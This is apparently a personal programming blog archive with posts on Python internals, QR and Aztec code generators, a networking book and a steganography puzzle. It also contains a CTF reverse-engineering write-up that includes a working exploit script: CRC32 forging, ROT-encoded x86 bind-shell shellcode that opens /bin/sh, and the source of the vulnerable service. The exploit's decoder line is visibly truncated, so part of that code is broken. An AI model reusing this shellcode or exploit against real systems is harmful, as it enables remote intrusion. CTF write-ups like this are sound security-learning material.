Thursday, December 22, 2016

Computer Networks book

Finally finished the book "Computer Networks" by Andrew S. Tanenbaum and David Wetherall.
It is a really good academic introduction for anyone who is interested in or works with computer networks.
It gives a good explanation of how networks work at each layer. All the popular protocols, network security, and encryption and compression algorithms are reviewed. The book helps to organize your knowledge of all these topics.
Moreover, a good list of further reading is included at the end of the book (and in the text of each chapter).
I highly recommend taking a look at this book.

Sunday, December 4, 2016

Insidious CodeType, or from segfault to a working code

Today Andrey Zakharevich and I gave a 30-minute blitz talk at ITGM about a real problem: a segmentation fault in CPython that occurs when a special function is generated.

ITGM #9 - Insidious CodeType, or from segfault to a working code (In Russian)

Saturday, October 22, 2016

Hack You SPb 2016 - Reverse 300 writeup

The task is called Serious Business, author: Arthur Hanov (awengar).
Task comment: nc 3177, and give me a shell.

We are given a binary file rev300_f3c8cc9.elf and the address/port of the service.

After disassembling the binary and restoring its important functions, it became clear how to solve this task. By the way, this task could also belong to the Pwn category.
I've renamed some variables:
int filter(char *buf, int size)
{
    int i;
    for (i = 0; i < size; ++i)
        if (buf[i] == 1 || buf[i] == 0 || buf[i] == 47 || buf[i] == 115 || buf[i] == 104)
            return 0;  /* forbidden byte: 0x01, 0x00, '/', 's' or 'h' */
    return 1;
}

ssize_t handler(int fd)
{
    ssize_t result;
    unsigned int buf_size;
    int v3;
    char *buf;
    int v5;

    buf_size = 0;
    result = recv(fd, &buf_size, 4, 0);
    if (result == 4)
    {
        result = buf_size;
        if (buf_size <= 200)
        {
            /* prot 7 = READ | WRITE | EXEC, flags 33 = MAP_SHARED | MAP_ANONYMOUS */
            buf = (char *)mmap(0, buf_size, 7, 33, -1, 0);
            v3 = recv(fd, buf, buf_size, 0);
            result = crc32(0, buf, buf_size);
            v5 = result;
            if (result == 0xCAFEBABE)
            {
                result = filter(buf, buf_size) ^ 1;
                if (!(_BYTE)result)
                    result = ((int (*)(void))buf)();  /* run the received bytes */
            }
        }
    }
    return result;
}

As you can see, the handler function makes it possible to pass machine instructions in buf and execute them.
But to reach that line of code, the following is required:
1) The return value of the first recv() (the size of the received data) must be equal to 4 bytes.
2) The buf_size value received by the first recv() must be less than or equal to 200.
In other words, buf_size is the shellcode size.
3) The CRC32 of the buf contents received by the second recv() must be equal to 0xCAFEBABE.
The buf here is our shellcode.
4) The buf must not contain the bytes 0x01, 0x00, '/', 's' or 'h'.

So we need to send 4 bytes (an int value) with the size of the shellcode, and then send the shellcode itself (with the correct CRC32 value). I found that it is possible to force the CRC32 of any data to an arbitrary value by appending 4 bytes to the data.
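The four-byte trick can be sketched in a few lines of Python 3. This is only a minimal illustration, not the script used for the task: the names forge_suffix, TABLE and TOP_BYTE_INDEX are made up for this example, and it assumes the standard zlib CRC-32 (polynomial 0xEDB88320, register initialised and finalised with 0xFFFFFFFF). The idea is to run the table-driven CRC backwards for four steps from the wanted final register value.

```python
import struct
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial, the one zlib uses


def make_table():
    """Build the usual 256-entry CRC-32 lookup table."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = make_table()
# The top bytes of the 256 entries are all different, so the top byte of a
# register value tells which table entry was used in the previous step.
TOP_BYTE_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}


def forge_suffix(data, target):
    """Return 4 bytes such that zlib.crc32(data + suffix) == target."""
    reg = zlib.crc32(data) ^ 0xFFFFFFFF  # register state after `data`
    want = target ^ 0xFFFFFFFF           # register state needed at the end
    # Undo four CRC steps, pretending the four consumed bytes were zero.
    for _ in range(4):
        idx = TOP_BYTE_INDEX[want >> 24]
        want = (((want ^ TABLE[idx]) << 8) & 0xFFFFFFFF) | idx
    # Feeding bytes B equals XOR-ing B into the register and feeding zeros,
    # so the suffix is the difference between the two register states.
    return struct.pack('<I', reg ^ want)
```

For example, zlib.crc32(data + forge_suffix(data, 0xCAFEBABE)) gives 0xCAFEBABE for any data. Note that the four forged bytes are not under our control, so they can happen to contain a filtered byte; in that case the payload has to be changed slightly and the suffix recomputed.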
To bypass the filter I used ROT-X shellcode encoding.
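The encoding side of ROT-X is simple enough to sketch separately. The snippet below is a Python 3 illustration with hypothetical helper names (rot_encode, rot_decode, find_rot); it only shows how a rotation value can be picked so that the encoded bytes avoid the filtered set, and it does not include the machine-code decoder stub that has to be prepended to the real payload.

```python
# Bytes rejected by the filter in the binary: 0x00, 0x01, '/', 's', 'h'.
BAD_BYTES = {0x00, 0x01, 0x2F, 0x73, 0x68}


def rot_encode(data, x):
    """Add x to every byte, wrapping around at 256."""
    return bytes((b + x) % 256 for b in data)


def rot_decode(data, x):
    """Inverse of rot_encode: subtract x from every byte."""
    return bytes((b - x) % 256 for b in data)


def find_rot(data, bad=BAD_BYTES):
    """Return the smallest rotation that leaves no bad byte, or None."""
    for x in range(1, 256):
        if not bad & set(rot_encode(data, x)):
            return x
    return None
```

With the bytes of "/bin/sh" followed by a zero byte as input, a rotation of 1 fails (the zero byte becomes 0x01), while a rotation of 2 passes. The decoder stub and the forged CRC bytes must pass the same check, which is why the final script runs its filter over the complete payload.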
As a shellcode I've chosen a port bind shellcode from

Final script to solve this task:
import socket
import struct

# Ported to Python code from: 

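CRCPOLY = 0xEDB88320
CRCINV = 0x5B358FD3  # inverse poly of (x^N) mod CRCPOLY
INITXOR = 0xFFFFFFFF  # initial value of the CRC register
FINALXOR = 0xFFFFFFFF  # value XOR-ed into the register at the end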

def make_crc_table(table):
    c = 0
    for n in xrange(256):
        c = n
        for k in xrange(8):
            if (c & 1) != 0:
                c = CRCPOLY ^ (c >> 1)
            else:
                c = c >> 1
        table[n] = c

def make_crc_revtable(table):
    for n in xrange(256):
        c = n << 3 * 8
        for k in xrange(8):
            if (c & 0x80000000) != 0:
                c = ((c ^ CRCPOLY) << 1) | 1
            else:
                c <<= 1
        table[n] = c

def crc32_tabledriven(buf, length, crc_table):
    crcreg = INITXOR
    for i in xrange(length):
        crcreg = (crcreg >> 8) ^ crc_table[((crcreg ^ ord(buf[i])) & 0xFF)]
    return crcreg ^ FINALXOR

def fix_crc_pos(buf, length, tcrcreg, fix_pos, crc_table, crc_revtable):
    # make sure fix_pos is within 0..(length -1)
    fix_pos = ((fix_pos % length) + length) % length

    # calculate crc register at position fix_pos; this is essentially crc32()
    crcreg = INITXOR
    for i in xrange(fix_pos):
        crcreg = (crcreg >> 8) ^ crc_table[((crcreg ^ ord(buf[i])) & 0xFF)]

    # inject crcreg as content
    for i in xrange(4):
        buf[fix_pos + i] = chr((crcreg >> i * 8) & 0xFF)

    # calculate crc backwards to fix_pos, beginning at the end
    tcrcreg ^= FINALXOR
    for i in xrange(length - 1, fix_pos - 1, -1):
        tcrcreg = (tcrcreg << 8) ^ crc_revtable[(tcrcreg >> 3 * 8) & 0xff] ^ ord(buf[i])

    # inject new content
    for i in xrange(4):
        buf[fix_pos + i] = chr((tcrcreg >> i * 8) & 0xFF)

# fill crc32 table and crc32 reverse table
crc32_tab = [0 for _ in xrange(256)]
crc32_tab_reverse = [0 for _ in xrange(256)]
make_crc_table(crc32_tab)
make_crc_revtable(crc32_tab_reverse)

def enc_shellcode_using_rot_x(shellcode, rot_x):
    """Encode shellcode using ROT-X value"""
    # Modified shellcode ROT-X decoder for Linux Intel/x86 from:
    encoded_shellcode = ''
    for c in bytearray(shellcode):
        if c > 255 - rot_x:
            # the sum does not fit into a byte, wrap around
            encoded_shellcode += '%c' % (rot_x - (256 - c))
        else:
            encoded_shellcode += '%c' % (c + rot_x)
    rot_decoder = '\xeb\x25\x5e\x31\xc9\xb1' + chr(len(shellcode)) + '\x80\x3e' + chr(rot_x) + \
        '\x7c\x05\x80\x2e' + chr(rot_x) + '\xeb\x11\x31\xdb\x31\xd2\xb3' + chr(rot_x) + \
    return rot_decoder + encoded_shellcode

def filter_check(data):
    """Filter func"""
    for c in data:
        if ord(c) in [0x00, 0x01, 0x2F, 0x73, 0x68]:
            return 0
    return 1

def crc32(data):
    """CRC32 function"""
    crc = 0xFFFFFFFF
    for c in data:
        crc = crc32_tab[((crc) ^ ord(c)) & 0xff] ^ (((crc) >> 8) & 0xffffff)
    return ~crc

def force_crc32(data, crc32_value):
    """Force data to CRC32 value by appending four bytes to data"""
    new_data = list(data + '\x00\x00\x00\x00')
    fix_crc_pos(new_data, len(new_data), crc32_value, len(new_data) - 4, crc32_tab, crc32_tab_reverse)
    new_data_crc32 = crc32_tabledriven(new_data, len(new_data), crc32_tab)
    if crc32_value != new_data_crc32:
        print 'Failed to force data to CRC32!'
    return new_data

def main():
    # Portbind shellcode 86 bytes for Linux/x86 from

    shellcode = (
    # socket(AF_INET, SOCK_STREAM, 0)
    "\x6a\x66"              # push   $0x66
    "\x58"                  # pop    %eax
    "\x6a\x01"              # push   $0x1
    "\x5b"                  # pop    %ebx
    "\x99"                  # cltd
    "\x52"                  # push   %edx
    "\x53"                  # push   %ebx
    "\x6a\x02"              # push   $0x2
    "\x89\xe1"              # mov    %esp,%ecx
    "\xcd\x80"              # int    $0x80

    # bind(s, server, sizeof(server))
    "\x52"                  # push   %edx
    "\x66\x68\xfc\xc9"      # pushw  $0xc9fc  // PORT = 64713
    "\x66\x6a\x02"          # pushw  $0x2
    "\x89\xe1"              # mov    %esp,%ecx
    "\x6a\x10"              # push   $0x10
    "\x51"                  # push   %ecx
    "\x50"                  # push   %eax
    "\x89\xe1"              # mov    %esp,%ecx
    "\x89\xc6"              # mov    %eax,%esi
    "\x43"                  # inc    %ebx
    "\xb0\x66"              # mov    $0x66,%al
    "\xcd\x80"              # int    $0x80

    # listen(s, anything) 
    "\xb0\x66"              # mov    $0x66,%al
    "\xd1\xe3"              # shl    %ebx
    "\xcd\x80"              # int    $0x80

    # accept(s, 0, 0)
    "\x52"                  # push   %edx
    "\x56"                  # push   %esi
    "\x89\xe1"              # mov    %esp,%ecx
    "\x43"                  # inc    %ebx
    "\xb0\x66"              # mov    $0x66,%al
    "\xcd\x80"              # int    $0x80

    "\x93"                  # xchg   %eax,%ebx

    # dup2(c, 2) , dup2(c, 1) , dup2(c, 0)
    "\x6a\x02"              # push   $0x2
    "\x59"                  # pop    %ecx

    "\xb0\x3f"              # mov    $0x3f,%al
    "\xcd\x80"              # int    $0x80
    "\x49"                  # dec    %ecx
    "\x79\xf9"              # jns    dup_loop

    # execve("/bin/sh", ["/bin/sh"], NULL)
    "\x6a\x0b"              # push   $0xb
    "\x58"                  # pop    %eax
    "\x52"                  # push   %edx
    "\x68\x2f\x2f\x73\x68"  # push   $0x68732f2f
    "\x68\x2f\x62\x69\x6e"  # push   $0x6e69622f
    "\x89\xe3"              # mov    %esp, %ebx
    "\x52"                  # push   %edx
    "\x53"                  # push   %ebx
    "\x89\xe1"              # mov    %esp, %ecx
    "\xcd\x80"              # int    $0x80
    )

    full_shellcode = enc_shellcode_using_rot_x(shellcode, 12)
    sc_with_crc32 = ''.join(force_crc32(full_shellcode, 0xcafebabe))

    if (0xffffffff + crc32(sc_with_crc32) + 1 if crc32(sc_with_crc32) < 0 else crc32(sc_with_crc32)) != 0xcafebabe:
        print 'CRC32 != 0xcafebabe'

    if filter_check(sc_with_crc32) != 1:
        print 'Filter check failed'
    # connect and send final shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('', 3177))
    length = struct.pack('<I', len(sc_with_crc32))
    # first the 4-byte size, then the shellcode itself
    s.send(length)
    s.send(sc_with_crc32)

if __name__ == '__main__':
    main()

After running the script, I connected to the port opened by the bind shellcode, where a shell was waiting.
In the directory I found a flag file and some other files. So I got the flag:
cat flag

Success! :)

P.S. I've also read the source code, rev300.cpp:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <signal.h>

#define PORT "3177"  // the port users will be connecting to
#define BACKLOG 10  // how many pending connections queue will hold

void sigchld_handler(int s){
 // waitpid() might overwrite errno, so we save and restore it:
 int saved_errno = errno;
 while(waitpid(-1, NULL, WNOHANG) > 0);
 errno = saved_errno;
}

void *get_in_addr(struct sockaddr *sa){
 if (sa->sa_family == AF_INET) {
  return &(((struct sockaddr_in*)sa)->sin_addr);
 }
 return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

void handler(int sock);

int main(void){
 int sockfd, new_fd;  // listen on sock_fd, new connection on new_fd
 struct addrinfo hints, *servinfo, *p;
 struct sockaddr_storage their_addr; // connector's address information
 socklen_t sin_size;
 struct sigaction sa;
 int yes=1;
 char s[INET6_ADDRSTRLEN];
 int rv;

 memset(&hints, 0, sizeof hints);
 hints.ai_family = AF_UNSPEC;
 hints.ai_socktype = SOCK_STREAM;
 hints.ai_flags = AI_PASSIVE; // use my IP

 if ((rv = getaddrinfo(NULL, PORT, &hints, &servinfo)) != 0) {
  fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rv));
  return 1;
 }

 // loop through all the results and bind to the first we can
 for(p = servinfo; p != NULL; p = p->ai_next) {
  if ((sockfd = socket(p->ai_family, p->ai_socktype,
    p->ai_protocol)) == -1) {
   perror("server: socket");
   continue;
  }
  if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes,
    sizeof(int)) == -1) {
   perror("setsockopt");
   exit(1);
  }
  if (bind(sockfd, p->ai_addr, p->ai_addrlen) == -1) {
   close(sockfd);
   perror("server: bind");
   continue;
  }
  break;
 }
 freeaddrinfo(servinfo); // all done with this structure
 if (p == NULL)  {
  fprintf(stderr, "server: failed to bind\n");
  exit(1);
 }
 if (listen(sockfd, BACKLOG) == -1) {
  perror("listen");
  exit(1);
 }
 sa.sa_handler = sigchld_handler; // reap all dead processes
 sigemptyset(&sa.sa_mask);
 sa.sa_flags = SA_RESTART;
 if (sigaction(SIGCHLD, &sa, NULL) == -1) {
  perror("sigaction");
  exit(1);
 }
 printf("server: waiting for connections...\n");
 while(1) {  // main accept() loop
  sin_size = sizeof their_addr;
  new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
  if (new_fd == -1) {
   perror("accept");
   continue;
  }

  inet_ntop(their_addr.ss_family, get_in_addr((struct sockaddr *)&their_addr),s, sizeof s);
  printf("server: got connection from %s\n", s);

  if (!fork()) { // this is the child process
   close(sockfd); // child doesn't need the listener
   // if (send(new_fd, "Hello, world!", 13, 0) == -1)
    // perror("send");
   handler(new_fd);
   close(new_fd);
   exit(0);
  }
  close(new_fd);  // parent doesn't need this
 }

 return 0;
}

#include <sys/param.h>

static uint32_t crc32_tab[] = {
 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d
};

uint32_t crc32(uint32_t crc, char *buf, size_t size)
{
 const char *p;
 p = buf;
 crc = crc ^ ~0U;

 while (size--)
  crc = crc32_tab[(crc ^ *p++) & 0xFF] ^ (crc >> 8);

 return crc ^ ~0U;
}

bool filter(char * mem,int size){
 for (int i=0; i<size; i++){
  if (mem[i] == 0x80 || mem[i] == 0xCD || mem[i] == 0x01 || mem[i] == 0x00 || mem[i] == '/' || mem[i] == 's' || mem[i] == 'h')
   return false;
 }
 return true;
}

void handler(int sock){
 unsigned int len=0;
 char * buf;
 int num_recv = recv(sock, ((char *) &len), 4, 0);
 if (num_recv != 4 || len > 200)
  return;
 char * mem = (char *)mmap(0, len , PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANON, -1, 0);
 num_recv = recv(sock, mem, len, 0);
 unsigned int sum = crc32(0,mem,len);
 if (sum != 0xCAFEBABE)
  return;
 if (!filter(mem,len))
  return;
 (*(void  (*)()) mem)();
}

Hack You SPb 2016 - Stegano 300 writeup

This task is by Vlad Roskov (vos) and is called Gemorroy (i.e. Hemorrhoid).
We are given a PNG image:

I wrote a simple Python script to get all IDAT chunks from the PNG image and decompress them.

import struct
import zlib

with open('steg300_where_8c7f6f7.png', 'rb') as f:
    data = f.read()

# get all IDAT blocks
idats = []
while True:
    idat_pos = data.find('IDAT')
    if idat_pos < 0:
        break
    size = struct.unpack('>I', data[idat_pos - 4:idat_pos])[0]
    idats.append(data[idat_pos + 4:idat_pos + 4 + size])
    data = data[idat_pos + 4:]

# concat all blocks
idats_str = ''.join(idats)

# decompress IDAT blocks
d = zlib.decompressobj()
decoded = d.decompress(idats_str)
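Searching for the string 'IDAT' works here, but it can also match bytes inside compressed data. A slightly more careful variant walks the chunk structure instead (4-byte big-endian length, 4-byte type, payload, 4-byte CRC). The following Python 3 sketch shows that approach; the function names iter_chunks and inflate_idat are my own for this example, and chunk CRCs are not verified.

```python
import struct
import zlib

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'


def iter_chunks(png):
    """Yield (chunk_type, payload) for every chunk of a PNG byte string."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError('not a PNG file')
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        size, chunk_type = struct.unpack('>I4s', png[pos:pos + 8])
        yield chunk_type, png[pos + 8:pos + 8 + size]
        pos += 12 + size  # length + type + payload + CRC


def inflate_idat(png):
    """Join all IDAT payloads and decompress them as one zlib stream."""
    stream = b''.join(p for t, p in iter_chunks(png) if t == b'IDAT')
    return zlib.decompressobj().decompress(stream)
```

A decompressobj is used rather than zlib.decompress so that any bytes following the end of the zlib stream do not raise an error.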

At the end of the decoded data we get the next part, a link: :)
The link leads to a video that flashes a sequence of QR codes at a high frame rate. So, we need to go deeper...
Using ffmpeg I extracted all the frames from this video.
Then I decoded all the QR codes using zbar. After concatenating the results I got the next data string:

The first four bytes are "Rar!", i.e. it is a RAR archive with flag.txt inside.
After extracting it I got the flag:
Flag: 57364N0_w1th1n_57364N0_1m_d0ne

Hack You SPb 2016

I played Hack You SPb CTF this week, and it finished today.
I solved 16 out of 18 tasks and ranked 10th.

Here are my write-ups:

Monday, October 3, 2016

COUB popular songs analysis

I've written a simple Python script to get all the "best of the week" coubs.
The first version of the script was really slow: it took almost 5 minutes to get all 6084 coubs.
So I rewrote it using the multiprocessing module for parallelism and got an almost 6x speedup: the multiprocessing version took just half a minute to get all 6084 coubs.
Then I used Counter from collections to get the most common song titles.
I also refined the most common titles with an algorithm that finds similar (but not equal) titles by replacing some of their symbols.
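The counting step can be sketched as follows. This is not the code from the repository, just a minimal Python 3 illustration of the idea: the normalize function is a hypothetical stand-in for the "replace some symbols" step, and here it simply lowercases the title and collapses punctuation and whitespace before counting.

```python
from collections import Counter
import re


def normalize(title):
    """Lowercase and collapse punctuation/spaces so similar titles match."""
    return re.sub(r'[\W_]+', ' ', title.lower()).strip()


def most_common_titles(titles, n=10):
    """Count titles by normalized form, reporting the first spelling seen."""
    counts = Counter()
    display = {}
    for title in titles:
        key = normalize(title)
        counts[key] += 1
        display.setdefault(key, title)
    return [(display[key], count) for key, count in counts.most_common(n)]
```

For example, 'Daft Punk - Get Lucky' and 'daft punk get lucky!' end up in the same bucket, while a different song gets its own.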
Here are the statistics I got:

I've published the sources on my GitHub

Wednesday, September 21, 2016

Python dictionary: Past, Present, Future

I gave a presentation about the Python dictionary at the SPb Python meetup yesterday.
Thanks to everyone who came to the meetup :)

In my talk I reviewed how the dictionary works in CPython 2.x. I also discussed the dictionary in CPython 3.x and reviewed the changes in CPython 3.6.
In addition to CPython, I briefly reviewed the dictionary internals of alternative Python implementations such as PyPy, IronPython and Jython.

Friday, August 26, 2016


Any sufficiently complicated C or Fortran program contains an ad hoc, informally-specified, bug-ridden, slow implementation of half of Common Lisp — Philip Greenspun 
Organizations which design systems ... are constrained to produce designs which are copies of the communication structures of these organizations — Melvin Conway

Sunday, August 14, 2016

Aztec Code generator in Python

When I was in Europe I noticed unusual 2D barcodes printed on train tickets. These codes are called Aztec Code. I had already seen this kind of code while playing CTF games.
I decided to understand the encoding principle and create an Aztec Code generator in Python. It shouldn't be too hard, because I had recently figured out the principles of QR Code encoding.
I found a specification (surprisingly, in Russian) describing the Aztec Code and created a GitHub repository.
The most difficult part was implementing the algorithm from the specification that searches for the optimal encoding sequence.
The source code of my version of the Aztec Code generator in Python is on GitHub:
Here are some resulting Aztec codes:
This is a 71x71 Aztec code with 394 '\x00' bytes:

And this one is with 394 '\xff' bytes:

And here is a 53x53 Aztec code with 433 "3" digits:

Tuesday, June 14, 2016

Amusing QR codes

This weekend I implemented my own QR Code generator in pure Python. The link to the GitHub repository:
I want to share some amusing QR codes I found while testing my QR code generator.
The mode is "numeric", the error correction level is "Q", the version is 20 (97 x 97), the masks are 0 to 7, and the module size is 2 pixels.
The encoded data contains only zeros, so the error correction codes also contain zeros. That's why the patterns are so uniform.

Thursday, April 28, 2016

Maximum lines of code for Python script

I created a script with 10 million non-empty, non-comment lines. The Python process consumed over 10 GB of RAM, but the script executed successfully :)

So what is the maximum number of lines of code permitted in a Python script?
There is no limit (other than the available memory).
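A small-scale version of the experiment is easy to reproduce. The sketch below (Python 3, with a made-up helper name make_script) generates a source text with a given number of assignment lines and executes it in memory; the line count is kept small here, so raising it towards millions is where the memory usage starts to show.

```python
def make_script(line_count):
    """Build source text with line_count simple assignment statements."""
    return '\n'.join('x%d = %d' % (i, i) for i in range(line_count)) + '\n'


# Compile and run the generated source in its own namespace.
source = make_script(10000)
namespace = {}
exec(compile(source, '<generated>', 'exec'), namespace)
```

After the run, every generated variable (x0, x1, ...) is present in namespace.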

Sunday, April 24, 2016

Python frozen modules __hello__ and __phello__

Under Python 2.7:
>>> import __hello__
Hello world...
>>> import __phello__
Hello world...
>>> import __phello__.spam
Hello world...

Under Python 3.x:
>>> import __hello__
Hello World!

Checking the file of these modules returns the following:
>>> __hello__.__file__

The bytecode of these modules (see the Python source file ./Python/frozen.c) is compiled into the Python library (python27.dll on Windows and on Linux).

To check whether a module is frozen, you can use imp.is_frozen:
>>> import imp
>>> imp.is_frozen('__hello__')
>>> imp.is_frozen('__phello__')
>>> imp.is_frozen('__phello__.spam')
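The imp module is deprecated in Python 3 and was removed in 3.12, so the same check needs another route there. One possible sketch, assuming CPython 3 and using a helper name of my own (is_frozen), is to look at the origin of the module spec, which is the string 'frozen' for frozen modules. It is meant for top-level module names, since looking up a dotted name imports the parent package.

```python
import importlib.util


def is_frozen(name):
    """Return True if the top-level module `name` is a frozen module."""
    spec = importlib.util.find_spec(name)
    return spec is not None and spec.origin == 'frozen'
```

On CPython 3, is_frozen('__hello__') is expected to be true and is_frozen('json') false; find_spec only locates the module and does not import it, so nothing is printed.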

It's also possible to get the code object of these modules and for example get the bytecode:
>>> imp.get_frozen_object('__phello__.spam').co_code

Or get the code object filename:
>>> imp.get_frozen_object('__hello__').co_filename
>>> imp.get_frozen_object('__phello__').co_filename
>>> imp.get_frozen_object('__phello__.spam').co_filename

To load a frozen module, the Python C API function PyImport_ImportFrozenModule is used.

Thursday, April 14, 2016

Python anonymous class name with anonymous class variable name

In Python it is possible to create a new type object without any name (or, more precisely, with an empty name).
Moreover, you can create a class variable with an anonymous (empty) name.
For example, to create a Phantom class with an anonymous (empty) class variable:
>>> Phantom = type('', (object,), {'': 'surprise'})
>>> p = Phantom()
>>> Phantom.__name__
''
>>> p.__class__
<class '__main__.'>
>>> getattr(p, '')
'surprise'

Sunday, April 10, 2016

Python hashlib algorithms

It's very interesting that some algorithms available in the Python hashlib module are not documented, for example SHA, which is SHA-0.

>>> import hashlib
>>> h = hashlib.new('sha')
>>> h.update(b'')
>>> h.hexdigest()

The reason for this behavior is that these algorithms are loaded through the _hashlib module, which is based on the OpenSSL library available on your platform. Therefore, the set of additional algorithms may vary.

Here is how the hashlib new() constructor is assigned depending on the availability of the _hashlib (OpenSSL) module (from

try:
    import _hashlib
    new = __hash_new
    __get_hash = __get_openssl_constructor
    algorithms_available = algorithms_available.union(
        _hashlib.openssl_md_meth_names)
except ImportError:
    new = __py_new
    __get_hash = __get_builtin_constructor

By default, only a few hash algorithms are always available in the hashlib module.
You can list them using hashlib.algorithms (added in version 2.7):
>>> hashlib.algorithms
('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')

Additional algorithms are listed in hashlib.algorithms_available (added in version 2.7.9):
>>> hashlib.algorithms_available
{'SHA384', 'MD5', 'sha512', 'MD4', 'RIPEMD160', 'dsaEncryption', 'SHA224', 'SHA', 'sha', 'ecdsa-with-SHA1', 'md5', 'whirlpool', 'dsaWithSHA', 'SHA1', 'sha1', 'sha384', 'DSA', 'sha224', 'md4', 'ripemd160', 'DSA-SHA', 'SHA512', 'SHA256', 'sha256'}
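To see which of the platform-dependent algorithms actually work on a given machine, the two sets can be compared directly. The snippet below is a Python 3 sketch (where the guaranteed set is called hashlib.algorithms_guaranteed); the helper try_digest is a name invented for this example, and it returns None for names that the local OpenSSL refuses or that need extra arguments.

```python
import hashlib

# Algorithms that exist on every platform vs. the OpenSSL-provided extras.
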